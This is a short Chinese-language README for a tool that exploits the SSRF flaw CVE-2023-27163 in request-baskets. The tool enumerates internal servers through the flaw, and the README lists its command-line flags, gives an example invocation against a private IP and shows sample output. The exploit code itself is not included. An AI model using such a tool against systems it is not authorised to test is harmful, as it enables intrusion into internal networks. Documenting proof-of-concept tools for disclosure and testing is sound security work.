感谢上海交通大学的 @beet1e(https://github.com/b33t1e) 以及山东大学的 @chenlibo147、@houqinsheng、[email protected]。
有关 SSRF 漏洞(CVE-2023-27163)的详细信息,请查看 https://notes.sjtu.edu.cn/s/MUUhEymt7#。
此代码用于利用 request-baskets 中的 SSRF 漏洞枚举内部服务器。
如果任何内容有误或需要调整,请随时告知我 [email protected]。
谢谢。
用法。 -w - 字典 -target - 目标 URL,包含用于添加 basket 的 request basket API URL -dynamic - 你希望创建的用于查看内部服务器的链接名称。 -internal_target - 内部目标 URL -ms - 毫秒
示例: -w raft-test.txt -target "http://10.10.10.5:55555/api/baskets/" -dynamic "test" -internal_target "http://120.0.0.1/"
标准输出应类似如下:
Page Link: web
Content Length: 2394
Request to reach URL: http://10.10.10.5:55555/test48